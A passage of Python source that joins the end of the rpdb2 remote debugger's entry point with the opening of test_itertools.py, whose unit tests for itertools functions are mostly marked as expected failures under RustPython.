_u = base64.decodestring(_b)
_path = as_unicode(_u)
_rpdb2_args[0] = _path
FindFile(_rpdb2_args[0])
except IOError:
_print(STR_FILE_NOT_FOUND % _rpdb2_args[0])
return 2
if fWrap:
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
StartServer(_rpdb2_args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, secret)
elif fAttach:
StartClient_func(_rpdb2_args[0], fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
elif fStart:
StartClient_func(as_unicode(''), fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
else:
if len(_rpdb2_args) == 0:
_rpdb2_args = ''
else:
_rpdb2_args = '"' + '" "'.join(_rpdb2_args) + '"'
StartClient_func(_rpdb2_args, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
return 0
if __name__ == '__main__':
import rpdb2
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
ret = rpdb2.main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
test_itertools.py
|
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
import gc
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long of infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass #in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c);
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
#check proper internal error handling for large "step' sizes
count(1, maxsize+5); sys.exc_info()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values lilke 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
#simple copy currently not supported, because __reduce__ returns
#an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle_setstate(self):
# Verify both modes for restoring state
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
